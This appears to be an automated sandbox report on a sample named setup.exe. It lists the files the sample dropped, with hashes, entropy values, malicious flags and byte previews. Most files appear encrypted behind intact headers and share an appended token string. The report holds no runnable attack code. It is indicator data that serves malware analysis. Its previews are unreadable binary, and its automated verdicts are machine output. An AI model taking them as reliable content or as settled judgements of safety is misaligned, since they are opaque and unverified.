              Preview:.h.6.......!.a..4;.*om....d...~........{.B.x.sf..^.8....UOO.U..%.!.=....z...tH.a<*~h..v.......n.sB.(...$...4..pJ.E..;...V...`.....7.m.z.....p...?.b.d2..;.9.^....yu!.c..DD..../.=.).|.?...0.....}....X......-.j.@.....=..`B..M....6...ZB....[q1...."....:.....Z....1..s.......a>PG.>..+Q...:...&..Bt...-q........l..:..%G.?.X...+!.u....J.z.;1Cfl.t.l..b..bM}...D.v.gC_jVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):771
              Entropy (8bit):7.68375530276383
              Encrypted:false
              SSDEEP:24:ni56830Y/zys4B4CUCci4uPaffj9WSovu6bXbNbD:isQ0Y/zyT4CUK4/fb9JoFtD
              MD5:B19DF1733E42AEE562BFB9D3CB70EA7E
              SHA1:FF3E4B9D2D384F9DEDE193C474E25297029D5B77
              SHA-256:462203B0F56D3C5DC00BA5377BFA02BDC6303FD7F85E34AB522B661720792121
              SHA-512:5F6E00706E9A317970F8535DE588D1453325F2961ACD33BDCD7D886510AB36B8CDED9FA9B691C2A5A1D85FB4D657D073B95EBF0160228D065D72D26BE0368E11
              Malicious:false
              Reputation:low
              Preview:<!DOC+.....BN.|.ngQT.J...J..*~...zw!f..@.0.S.0]e\.>...qt..(.&.Q.v.g.p3.y..".=;..7...S......l{.3.9.........)....1.=:W.fig...K....O........qu-9......C.`...z.q.h.7..".H(..'I!..g'....0........6b.^.X.X9..k8.-......:Vr......r.P.zb..^.<.F.P..c.]....?[7m:n$...i.M....3.g;....$.Si"..I./....oZ...$:/......_!...S..Se...._.[>..J.J.=....?.%8._...w.=@....f..e........?Z.(0..N1Y..6.E!U..!Q.bU29...q.J.).J.0...IC...f.q...8....I.X\y..F..Ll.......@Y......IfB.w.q.....>3...[".(.0Q.Uh(..%U.....6.N.Q......SY.>.w....o..Y>.V.=\...$..h-2o...9e.|..&.7^R...?.".(..hK,.....Q..._....N......jD<~...a.$...........RE_Wi........V.$.....9../.L..HU..%....K.n.L...o.ox..C.*j..0.N].....}....`..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):818
              Entropy (8bit):7.756607018802184
              Encrypted:false
              SSDEEP:24:YKW573eWEZfHaeLWpwTZxjfvFL5WRzni+WbD:YX7uJZCkWEbFk4dD
              MD5:ECD0CB7A4AA1C428361BFDF707CB890D
              SHA1:283BF7A1D722D1A2A83B0100BE2F62089A1F84D1
              SHA-256:DC89416005ED0EA8CB98E1A4F89D29B6FDFC01BCFAA1965908306677CFA1109F
              SHA-512:81FDE7CCB54C734158B60CE3C77F5293A9871A96B549D186227622AE25299E918A5A05C00B44003A8949E832EBA05806A26B4B4EBB9B86C8EE1044E5DAB6ABC5
              Malicious:false
              Preview:{"os_..u...+....(....KF....A.Tf..y..TdF...B....%.<.......S....W.vk...v.u'.B.n,...M...p.8...'6.'..4....%.rE....1<.y....B(wo.r)...q9....|G9......4*U......a.J...,B`<4.v&ng.l<.....R\..y..V..?g... ......:+~c...s.>~h........-.._.X.1...C.....G3..y....4...o.W..$f.I..*......A....j.;.\.Pp...).f..L%.D.!.....9...pc...aY.....#..-.z.I~.W...d....j..q....%.....:.f..8..JN....G..%@...A.A.v.)..;OE.5.\?.....>.}..../.."....9.....j...... u..p4(. qa.........G.....;>8...Y........b....f.X...?.Qn....(*R._..O.67......a....'..."aqD......h.9...M...[..y$.I..~../..V^..x.".4.?bP..#&..c.O.#O..."Q+..MK.F0z..Z. 6...#.'._...3..dM..q.=...=.e;...`.R...;.s.7ae?n...b"..?...#m.).a>[..G.g./..vX..5.X.^}..`VJ......8$jA.*4c.T:..ge...9..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1483
              Entropy (8bit):7.862432707520034
              Encrypted:false
              SSDEEP:24:snHXWqY3cCgF0SR9BoAk6Lu6715JSLHJUDoD2rEgFdsSxMqQUsWwZOzriI8SpzEr:sHhYYF0SREAzvcLYoD2rEU5e8sWwZOex
              MD5:2E843EAEEB88F040191D8A190E3150C1
              SHA1:F32BADF98F19B3F584ACEF556EB487A4AC05A755
              SHA-256:A4622D485C20C7D5306E91E50E9B37C854C7E19EDCD75EE50448E369895D5755
              SHA-512:00859C5F8DF1C8BE04FCC53E4C4347C7EB99B48E36CE8166FDA9DA3391B82CC93939A0A7DD61BA5427992CA7D54D176F81AB6824BA098C2EBF1B23C837A5B94D
              Malicious:false
              Preview:*...#...k*.A..#....$[_E.....].,..l..iN....?..W.....d.e.\....Z...@.2..AD..oWHf;...W..N.OX0f....y..8.SH.M...Ti)N.Y.I.......<.-.........u...j.k..{..].....S........VA...s.q..;...^.z.j.|V.....=....A..].[....+.......c...F..Q.Z.$..3.......yH...A....U.).Bh..!......1....f....h..j..%....1)..@....T...E....@f.5.aE..1s.'..z.>...|H...i.O.%N....G?5..a`Wj.@P....s..}.@..Y%.....I.....QR7$vd.A/.T....&..Xw.7...x.<$...".*..#.....{T{..a'....u.T!..c.^.9..,...6..c.....$0"8m.......f..E.V`Fk.g4.A1..%...Gc..a......|."g...F.:Zx....C.y..o...!3~t.#..M..XqxX....k..`#...X.a.........0.s...^.s...()I.K...T.....H.._.|.G..;\...\.....=.0..LQ ugS.W5"..................#B6.`3.T.80.*h.....p.V(^.......$t.xg...".*.~.1..I.W..b; ...i..E..I...."%5._.".N...!.).,.H...yC......o.G...|.I*nO..p....v..f<...... }8_.....<....'..V..{@|..H.....,w...H.?J..q........u.a.r.T..N....C-..$L.h.a)...?I......OG....^frUH.h...~......K...$d.YX.1h...vE,/$.A.A.)`......<.X...w .....Z.MM\F.....3.h.'.........F
              Process:C:\Users\user\Desktop\setup.exe
              File Type:PostScript document text
              Category:dropped
              Size (bytes):1567
              Entropy (8bit):7.8579592563595355
              Encrypted:false
              SSDEEP:48:nBbk7rlF3JGTzolxC7FYBTA4hbKsWJEYfVCZNED:xIeKxyYBTA6KsW9fv
              MD5:51BB2130D54135CB104EC1278CD36F69
              SHA1:63F18FC871FE46D9D41B6E164BFAC0B73D04C706
              SHA-256:2385BA6A985379114D494F6C313F69FA025D3C8815F9BBA654111EB622E164E1
              SHA-512:79C506FA4B334D90CB4C6F28C91286935FF791A526F2196947E12CFCD42E80EF8C6E2D44ED7B9B6A0771B079D5A4B57346A1264021AE03E9A8481E910F806980
              Malicious:false
              Preview:%!Ado4...s......an......%lz...e...d.x.?.k..zs...N.k.5.n.d.....]..4.#]y....[).....1.a..b.3.iAo.t.i.y.....g-m.t.B.bH;2..P6...../....6z.T:u.y.k.b.^Y.!;..m..*n..%.q/..l$.....D.5.......P..!n....XK...c..%Dw.##.$.K...L.j..t%.9q....,.j...$..$.0..5.I..."...f..W...y.......W..7E.>....V........p..S.R.p..X-..M_S%(]..Or.....k..>.....C...q.;v...*.*2'.7U....(v....s[...I.(.g...;}...[t...,[..^.{...AE..u.x..4w.!......h.... ..c..G.b.....T.-.(.. .".....z.Y....}.H..qi]m.L.;.fd...XQJ>~.^....O....\Fz.....'......O6.H..t....ps+.Tj|,....o.$N....I.......z......T..:...2.So..).|P....Aq...H...c.?....m.3..Z.. .}..O..d.A<o..'..{5.....y.}....$.`.0..z..iM.-........'.z..1d^_.Y..._(K..6...t.IDW.=h!>fp0..N..>.GR..B.p.....Pv.\X.....=.!mg..6@./~=..t....E4.....Kj._h..-.....3w..t..O.J.r...`...nut.....OG...jI....D.Pl.S....B..R.......*..)R6#yO...V.......g.....Wqu..M.#....4.}.........g.G".Y....v.O..wm|Mv..+h.."vX[Y.M.5Y...............=5..Wsga....4@L.........M..e-.c...!...g%|...:.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:PostScript document text
              Category:dropped
              Size (bytes):185433
              Entropy (8bit):7.8775461475313975
              Encrypted:false
              SSDEEP:3072:pvM9wQKUYuUY2nQshm1DlAvStMpxV0KaAvqDTF23GxXE07ZmandGCyN2mM7IgOPv:xM9weHJculAFxVBazd0cXE07ZmandGC2
              MD5:DF36567C2453D6F6F32E4ABC9A61B480
              SHA1:828809F0DAF77656D92DA9FD9EFC153DB62CA5CD
              SHA-256:1E09E9B42CA2414DC86F2278BC78D3D8A10A1925B44614651D2C6A53EABE9DA6
              SHA-512:56ECB06C089F252E8D65A6DC130EA0B3CB824073DBE73299F7E7AA3448715F70E48E389EF21F58580A1189B2D587400A8578590149777B2661B717B35316F33E
              Malicious:false
              Preview:%!Ado.....`.....'......3.$...^......?.6t....Saxyc......W+.../.......=.|AX.....{..5.wF.....G..H)..2..1.B.".(.....&.h..fm..J..9.y.S.RW`^....3../m.W..}..BA..&..D.....*.e..r.vQb.....#Q.O..Q...3.lY..ff..h.8....Z........M.Pn>..P........J.C.......T.4..1..L...z.d>V`..~O.^j...d.D.,...F..)...;.Z.r...9].$..v...O.p...-...57d.G.V.Ze.......?..^.Q.}.r..y.._(<.=......^x0...u.9..6..b.&..h[\....F..,u...c.....].?6..@7{*l.T,D.8].c..@...L.$kL`..@.GE.QRT.V.n....V.)P..mA..._..L.^....:..z.....}.. f....W...[5.s. ..H=....6J........Z-..n...e.......>W........C2..A...A.J.}.E3+.Ts....J..D.."0...G.=...X...P.... ...er.[..}p.....8. ...m....d...!....0.5...3?..f.@..Z.._N.!.4.A.....bR}\V.X.bV...........U.O....QY.G].@..t...g"4....3...F...1_|.p..xc8m....Q.U.J....)...>P.~...E+.R..............Q...(.t....#.....q.]Cn..|>.X.3..U..)........H..c\.0.....R;..`.....&..:,..NO.....t.g...t.h....-.Ve}..iG.Z.TL.fG.......y+...n\+X.......eX.v...M....S*.|..'N.....J,..CZ,..1..Pv....d.L*.J.18\..(
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):227336
              Entropy (8bit):6.985751692437521
              Encrypted:false
              SSDEEP:3072:SAcRBZzTUMeJfwjVlb5hB7n7rmUbaTKORP9Ldpbr1gTHsrk9fdOoWiRnr:RE/zInhwntHLadP9L3mTMgRnr
              MD5:C270FB2C137E8ACE6E2F686BB574B863
              SHA1:344D97ABE923F3FA2BDA3AFB9C002B3DC270111B
              SHA-256:7BBAB6082A9F4DEB0818D4FA7CC85EC6F6093DF0BCA9E8A8A2F9EA0E41B31D96
              SHA-512:16A007E39C44057068802901D8468DB91AB7DED16C6E3B48A85022FCF52FD353015CFE554C0BBC63D5C5C0D86FA4337B6AB7544E278FA3B39AA735CD317F69B2
              Malicious:false
              Preview:Adobesr.........Y.'..;....l..H]Fz..5.k.F<..`..(.E....|..._H..BBp..*..9......D.....~.z...]..c...Z........Nu.z..9.....j.D.....J80.....OY.:...G....,1.4..[.4$......*.}..r.+.Z..i.....B..A.v.Ft|B,T?...e...d.......=Y:....M...4..7.......".&N..&...S.+.....\u.q..t..|....?x.u&6....K.......qM........M..m.gf...SKY.<.-..i.b..`>d......,xYBz6.p.o"p%..u..(......F.>.W.?..Q@..V...7.t\.t........^....O....A..:....].8.....w.-.7K6../...jIt].W...xb.......XQ..<4k0...].jxs;...$.m...=.|..i..9......U.h..M.>..RX.......l..*..p... .J...1b1O$......o.{.g)4.......;...R.{....>.E..\=...)....-..&BO\.M(p.d..{..X.......P.:...@>I..N......U%zys..,.F..d}...b..|&l.....%..}.b.L}AU...,-!...Y....4.."......yt&...\6MK..Y...I.2...t......[.n..~......w...2..3.Bce[T..4..7T, G....1.e..G.H`...K.>.M.{.._F...t........:.......%........Q.;.-:B(.o2.....k;...q.F......t2d...q...h,9..h...aH......c.|...|........>/._.eSj.e..[.......kX.W..4...X.2..^....AJ.q.b...../_....5..jvz..E^3..B07_..".9.I
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):3152
              Entropy (8bit):7.926619640184734
              Encrypted:false
              SSDEEP:96:EGWxNHYYpmbvptFGym4aH7q+YJmVVmBs6dKp+kw:EG+Nf8LA7x+sVmyAUw
              MD5:DA48D29525F13215FAD582CE7F671711
              SHA1:07AD78331855BEBE9A7507F6A2BC651670006AC1
              SHA-256:9E372EBC0955FFA5539D8E0201F9A580B5FD5851917638F03E448F8E4BCCD9CF
              SHA-512:E9AAFF6CFEF2E01D244FCD440AFAE2351B0EA5EA164EFD8B3F5993E8A5EFA35141711F84BF1CCA1256FB67FEF2F80AF4AAC42626F729F636C1EAC92B2444D353
              Malicious:false
              Preview:{"allB.*..C.........-.~'.v...f...."....^../.S...$K.W ,.."..d.\z.k.....;.-.E.V,.._.Cr#0. p.&.T..6/...[.......aA..E!...-..g&....^.{q.....E.;PD......H..v.....b.p.m..&.3p`......%.:.z.Z......E"?$.y"+y}=T.3Y....Q......D.U.J.....1..3~../.Jj.]:.l{...Yf.!.$...+..y.K.^\....\:...[}...B%a$.ZV.CsA.z....P.*s.r/.6(.o.G.z.....u....B.YS.Cq.i.d..L....*=.v&pUgE..Y....:....z.@Q..?..S.O.cd..n..).g..XF<z$.'.7`....0m...._..U.J3C.p.ipt..b..._TY.OlG....G(+Vv....).;....).....$..J.>..$.$.E.l!u.J(..'.7w.T..hP...t!... .0..O#,....u. r..d...........f.....H..c.?/.Hy.7w.........~...YrqO....t}6z5j..3...H..I.T0!..:....j(.<I.8+.a........>(h..Ou.:.Q..."...`..8.6>W...........U]..9...c..Y....V.w@.}......j.+C`V.B..}N.....4..3......y........O...@.b:......]l..a.$.s..B.*../.D.";.....q.S.%uu:.b.u.H.K.......G.O.1F'.Tx.L...O|U.G..[...3!,Ft......II^."V'...3p.].^H.$.....$d...8...~....K.%..c.D.N@....;../....%Is...0../.].(*8;....,"..r.PR..2.5 uo.9|<~...Ll.G.-.G..W.....R!..RR>F{[..\...=7..X.r.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):67060
              Entropy (8bit):7.997310389453529
              Encrypted:true
              SSDEEP:768:lf1hC6wQ6KULQVmwtylHRxW/akeQpzDexyIgkndDJ9r9iZFQuxk3hHhNGKcw2g:demUcQw+HRxWyyp0ndIjQus2m2g
              MD5:48DA0BD72B92F1930BEE07A323EC7D8C
              SHA1:FA1FD39263A43B8CF1A127835C0703BA36C33D0C
              SHA-256:D89CCBE165C3513B6306C3DF4187382BD3AA6EFB0CB036A12C47232DC681C33D
              SHA-512:6E7A498A39BAE0139C374729A5B7E4F5ECF149E0CF3D8706E329A23FEB650E6A1E2D49FE0136A65255B7586FB1498C08AA94BED5298F3203A428F3DB7DAC8A8D
              Malicious:true
              Preview:4.397y.B'...l.S4s.~.4.&.W..d.=..A`t/..:mh`}V../....A3.P[...w.h..W..t.i/Q+|....=._.i...+.F..s..+M. ?2..().h.)..p.`.."R..V..ZG....f..R.K..Q...k.&k..".G....FI....@;...V.;J.?..#..]SmT.<...."C..*.....$k..v..;...7._M.|O..L....m38.yc...od${..6 ..K....W:.KkQR[.T...)].Z..<).H..Kq7y..Z..9M2.8..9[..-......l0.....w......pj.,l.y.kQ.Y%4...7\.L.......M.m..f.....9..xT....*..w...5..M.7....vwC..D/k..............h./.D..)....`v.......D.y~B..c.H..e8....V..c.....y.3..`2..)...m.soiy..|x..c..{.>..U..A..3E...k...). .{..........}.!_........5_..8.&x...G.......A.E.J<.5A[ |YI.0.....<.t.v!+.X....$....=/0dl....cD.A#....[.pJ..sC..=.=.E....g..V|.......E.p.....Q....+K.<i...}.[...w2...*...Yf.I..!...H...r........`../.I.1...9..}.m/.SZ.. e....{..C...P.Z.kfO.......'......]|.S{...../3...y....,...-.!.....>......9..e.....R..Cx..L...&W...$..7.t..7*.$k....D..&T?.(TJ.....GEy...zv..a ......).........N...|.\.OQ.4DS.. .>..$(e.I.,..dG...)g....Y.'4.....e.....z.).....!.~!......z|.Xh&%.?..W...y
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):486
              Entropy (8bit):7.535277115123846
              Encrypted:false
              SSDEEP:12:qLm8Xg0z6ptfKPqu3Rps5TdD8t+sMR2cii9a:kgKKEqcAbItvbD
              MD5:E19D0690D9E8E52885140D3C6434A268
              SHA1:56ED62860E33D67D1968E9298B58CB5D2644C85A
              SHA-256:12E0F771984C749F34A554B2EFACAA1E8DC361A95972DDB74B993A82E42F4B05
              SHA-512:3E3DFF7028D823ABED2591EDC75A083545258CED5DA39B3500A4CCCFC2A1BDF08BCEF5018B9093EBED4631C038FDDE60264AAEE936305E2FBF21E8F942168451
              Malicious:false
              Preview:.f.5.....?...w..a?7n.1..g..<bG...2nf....(.(.'gt..So..&A_.[Pl8..k.;....k.#>........._+V..a...?.`&F$..E*.r.Q'....'...0.....C%I.N.#Lh%.7..G.TR.A.^..7.#...F.,.......2...|..m..=3q..,.*h=p8...L..........CI..*. .O..n.....I.._..=B....w...f`.X.<...t.X.I........h...Z(e~.]|./B:.!X.-.S.."t.W_>..uo=....1.Fe.d...PP.@!...z....J.khu......z..}....y...?...v... ....m.......1..d.N.C...^.D....*...>.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):486
              Entropy (8bit):7.530197774465042
              Encrypted:false
              SSDEEP:12:q58+NGGPdC6pPVQ80AcTDop2DpoNzm8dMNvXCw+1sMR2cii9a:A8+NGydfh2Aw42toBm80S3SbD
              MD5:841FE59F7EEEC34637DA2ADCD5608B83
              SHA1:8783BB8A8702E0DD269B00551053B9E5976227AE
              SHA-256:235C72EA89D25983851A371EA7A4DCC4CDFED16BAEFD1EAA7494C65184A104BA
              SHA-512:1926176A573F6842B01936FCA35D0F5147C225430C8FFA9B4371C8A5879C59E9E15DA6BBA9C8DEE15B4F1F1CD2DDA45DDABBE47680A0F0BBB9A95209E401CF71
              Malicious:false
              Preview:.f.5...Eq.&L">4.|=u..(.....~..$..A..8r*.......iRii:E.2j.*Cd+..W..?^.._...)0j...m... ...e...B....N..qe~e....~N..@.....V..l._...bL.d.Z.'Z.}....g..._9..D.8!.o.X&.K...m..J.<...@....a...?)...Ns...tPP.6...B..g.{._z..$..l.EMPo/......|..%..~usN.E.v..T<...3m.G...4*J./m.......M..>W.K..*..>h..U....%.o..*... c..'S.=..U...4r.[c....1.]..X...`..to(p..&..?L..|mxY..-..}..m....|.y.BJF...j....?c..u]VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):790
              Entropy (8bit):7.758824890036633
              Encrypted:false
              SSDEEP:24:mNMxWU8BayRSa54Qem4k5fmT4wlviGOuRs0bD:vcBayRSa5zHFWiGOuRZD
              MD5:D854A2D8CB5F671E341507546BAECF84
              SHA1:5B4EF8265AB80CBA3A853B2843E8F0423809146D
              SHA-256:8EE4DF77074A0A3D8C613AF2900EE2D80B50820244EBF77207154AABEAA46E87
              SHA-512:5B0F902337944A7EFBC6DCC937B1EB88AD1ADE92D8936A96127C5490D39F31D88C663A9ED9207E90F6879A665F745A2E9CB43AECD0DE390485C14736D7B40092
              Malicious:false
              Preview:.f.5....|#Z...>..p.....N.-.M..L....'n#Y......6...8.Y....+.[dk0X.8.Y{y.C...8q.;.".<.....X.HW.y...L-....y@%v{9.M....zYv2.Y..A.;@^....I....mU..$f9k.M. ......E\.,_S.<...8.b.[.mp..o.+&...0K..v[zG...G..,.G>...TO.bR7..m.RX.~r.r..~]..r"{F...&...h.>_...t(..{..kg....../~...)...U*...,.fO....Ax9.Y./.`%...(.y....z...X5....C.L.t,. v...D..a.#.}.Lcx1..ub......n....w.....;GT..-V9Z.lq k....)1...=G...OA...h.NSy....1=.#.r.f.....*......D.._?.:U{..8Z$6w.S..|.......x.6.Is......d.......WKNr.....&...^....{B...Nl..~6.......A.*..E......$&....t..k.f)..r.uRc<...m.....{...y...I......d2t.........jC...B.P<.2.T...-A...KV..*%.jM..@............E..:..{..s.F&....).}.r/:-b...lS......V...u:e.i...!VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):660
              Entropy (8bit):7.6540065271385265
              Encrypted:false
              SSDEEP:12:kZ1c99UJnsoi5wjYr9GCmQuG4RCwhuB+BboGMS78FVSk8jcNd8jpcsMR2cii9a:e1U+TNjSmnxgwBCG38FVSVc8jpFbD
              MD5:D106071A6CC7793BFF9A01166EC3BCA4
              SHA1:4F003FAE8AFE8EA48D067A44765E4091C5D383B5
              SHA-256:F4E22B5456F513F185BCFAB7DF4790185BF5C6DCBAFFE4C8569A92B26C375893
              SHA-512:DBF0D3B0366EE869CC023547497B95B946C04C1FF996B7669FC4081FDFEE6FA21F3F2F39F508DDBF500298EDAB7D0E1B3C1D4CD4D4B242757B0BFBBB6D5190C3
              Malicious:false
              Preview:2023/..K.k;.z.0...ya.94M...../`0. ....j..<...&......:...{.....gL.1F'...d.L.v.`.T..K#...ym.[..prCx.Z..?>iL.)J......i..<...jZ..<.m....w../.1...:x...&X(~...rb.J".v.A..PLY........o.............kl.r..."..i ..?...#.[...N.0\!.%....K..|......<&Y.4...*.t...Lq ...X<r.8......(..O....h>.1...\.}..!.\NT.o4j.x......*.a2C.7..W.....k;.`.%..F;..m.{(e.6+..).h.......,..[#.o..M.../.b...:...F3.....N.....3..`...ad4..D.....=.{.HCukJ...........u......I..o..(..o.~{.E.y..'.r!p....>...yb..f-@.P........S.....8..3l..0.6.x.>..>oM.[.n.*SE#.j.qQ..D.....o......H.h..!eYVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):5316
              Entropy (8bit):7.966871984169057
              Encrypted:false
              SSDEEP:96:aN6X6sWuIi18OEgmLxECtEGh/3uALu1s2s2vdrTeJv+UuuT:aN6X6sWuIOEJS6Ew/ud3s2vtigW
              MD5:726CA1AC9A931AD0EA4698C3256787FB
              SHA1:77177BE70D7080B9D03E7AAEE7A0B75FDFED3BA3
              SHA-256:A037556F797AE86C94B0F1F38F369C4B356DEF3AA21AF5AE04CEA22D62A5A56C
              SHA-512:3EDBDADACF196C019C3E58F9D05FE85046CF1D3454A45D63865F3132371AEE39DE81C83BE4CBB0DC3F6E8B67D2294B8F33876B281DB1D7360A54287982F82DB6
              Malicious:false
              Preview:.PNG..!..T....'..N&....q...$.6.Ep.\.7....u..V......^....pi.t....#.=.a...:.fD;=..W.7...*!....p...a%.f_....Z.$..k..B>.A7z..i..u$n@..N..O...r8bO.....X-..e..b.i.a..p}.....-..0....2J....k..@N..<......2.].B.~...D.i....7.1o...tz...[....U.H..e..b..R.....E..2.pi4!...m...T,.w#FG.D.'4)..C....g7n.I.h..p.y......h....2....M..r,...<.q.M.-~.@#".'.~..........z.i...?&....j.k...S...&C}Wh.8n..-._.M`?nf%..=....]....p" ..Jh.uY".Rr.S......I.4+...11..%^.S.<....az.|.+-P.Cr.{...(..<.p7T.!..$..h.!....r3..nN4...?.:.........{.8.....=.5._.z.5..'..w...P.+..hR........6/.i.p..r....|.z!.9..D.[X...c...}...$=W|...Z. vl....i.....O.;l.a..`...`.5$;.V..&.<W.+....M!.3.y.H...J.........^....A>:.Ih3$.X:.8>.IU..f`}...L.C.V.gl|..WD?f.....^.C.m..r.t~..`.Pa/.......\..DF.X.y) .VT".".........>{.... .....Y....+..T(....d.@6.7h....-%...=i.)*....Y...H.Ba.6y...i..8R....Ta.Y..I.&3..:/.V.^+...*...-..>WE*..(.....i*.:...{g....t.b........9./....2..M@.7.?..h...Opt.....W./..{..{....jG.:M.~.I.J...UB.. .6.G
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):3748
              Entropy (8bit):7.949979077090257
              Encrypted:false
              SSDEEP:96:/d/NBuXEuZ4eF5Ws/5okK3uR7T07yz6y7TMRLjQn:/dNBxuZbWsxFNH0GDvn
              MD5:DF55813D4C57D5DAFB89D7983D578455
              SHA1:7D597A05AD5389DD98E678B19A0600B5CF937B93
              SHA-256:55E9BAD1E8D95C9306A5C0B4296ABB81C4DF8AEB203D7C1163B4F1B452304DC7
              SHA-512:745F2EA23B6A76349F47E64AF8A271995E4F1B3F653A3F8DE21EF82A5F3C6303F0732FCFB0F076B344D85A09832D0C33AB37EE3CB7A83FD1634FF98E974A3311
              Malicious:false
              Preview:{"filQ..Y|...2.00.<.......!..V.W'..;W.W.S'.........d.......%....c.......hf.c.8h\....U.o.5'....%.^....D......Tg.P.n}.E.-t@=....j...G....b...d4...;.Hkh`..........hs.Q.......@W:z.+..`...]{....vq..g.-\.]....O-...N.pQPQr........f.i...i....-.....2a.)..n....ZO.Y.t....I...T..0...g.tw@jhHKX..5...:.=nC.b.t....|..J..A....rse.4..6.....3.....FO.g7...P...Z.. xO..W..T...CJ$..d..1...*..0Dm$r%4.......j.&..-$.^.....c.\....t.R.P...25..wD.M...l...=..aF?.2..........S#......r.. ..E...N.../orU.....g.){.I..t..N..C..'....E...$.XQ.M...Q`..k.Vw$...fDWJ.,...EM..|(By.9.=...F~..q4}e...2...B%.9F...7.GFj..r62.-.gl....!.C.........mE.IWC..?I....4.0..W......e.>......M..[...w..2EU....*.k..Q.7.....7..V..~.3.<F..;t\..h..O..#.S.7.T..M..I.4..n...`O.....p_...Y.)]...<.{....|bj.....*J2.h..:/......9......q ..o.E....=....J...\...9.....=.6=...._..7;.z.S....L.=p"..&UJ.U.....R...b.]...Y...M.....W.....2...\...#...........o.W.8q..P..y..I.y.....^...2..2D..&.m.].A...E.Y.k...F
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):18852
              Entropy (8bit):7.989892352807042
              Encrypted:false
              SSDEEP:384:Q6bQd+5N8rVjFZ9l7BZpsjzZzHEPYdyZhwkBbkdTBt74yA:rQC8Rjv9l7BHsjzhyYdimYbkNf0yA
              MD5:BD2C3C9878FCD48B610B01902EF46845
              SHA1:B13547DB5272EF40FBA097572F6927A1A2EF512A
              SHA-256:05E6B4E015447495D9718F663C1F7B8CFBE229E6F05E575F1F8D39C5C042C444
              SHA-512:63FB6466F5AA3BC5C0052A6D2067046929CEEFF54EC7C81B2CCBF3589D8B8F08AA149991E4D2F3B1383AC1AC36AA52DB372128F21A1C0F294CCD4AEB13D63CFF
              Malicious:false
              Preview:[{"deT..cpx.A<J...*2..uR...8..Zuadu.c..m..w.^..........f....a."....%\...).P:b*.|..<...<9.....r..t..&..4..\.4..... ..c.a..r...^.....vx..kpH.(....HE....#..Tma..g...N.\..J..e.O.>5...D4..S.U.._.8Z.6..6..h#^..d.Q..zP&9.'t.`.>L.......".5g..>..t..}.6..v.6.s.E.t<);N6..ZJ.....}......2....,.4.#t.......J^.v....U\.0K..I...D.6.`n...4Gsx.H[T...]L.c..`.....I..5.j....3...w./..R.k.lw.y....2.'l........s2...9.9 .^.}.N.9..5.+..,..k&Q............tdMf..\-.....#.m......<.=g...,X./n.....S...&+.w....Wx........r..!.].....N..%I.V.a...+.v.........2.....).q..#|d+b..n.Evr.F.P..N.:....r\Q..Y........}.9..f....C.y.Yr.x..S..\E|X#...!.yb..3M.).....z.....c.&|.....m...2.......t.T......%..Ehu...=,MP.^Bv....c..R]U.&..........P:.W....K.k...-8.....?.Z7.W.......$.A.....O..M.?.ii.'7.(D...........$..bK.....k...?.tZ%*...-.\+2.Cv....Z......|..b!.4.ll.r8...#X.VJP.....S.-(G.8O.U.F.\.;.F..D.R.s.|.1.E.\rT....~.......,.{.i.cK~._M.(@..yX|p..`...!4.B9.!8...r.....&YL0.o)..5
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1188
              Entropy (8bit):7.82591127065965
              Encrypted:false
              SSDEEP:24:zrOP+GMvt2V8WfKW8XogyZn2TKwSCtrfue1ObwiAucr1YbD:vc+kHN2ryZnxm1Ob2GD
              MD5:F1BB079F926062949E90DA5A12FA0E22
              SHA1:02EE87C8944DC3F1304C00484140D1A4E9E9788E
              SHA-256:23EFF7509CE4FF72701032611A0C48CCDDEFFEFB9D8F01E43C11592A7301A775
              SHA-512:15C902CDC3AFD678A7251EC98C98B8FC5AA41AB757C9B61D152B8094B99A46E0642EC023903226192D99E1B7160C853D66A756F7E90212188C7E80B28D7024F2
              Malicious:false
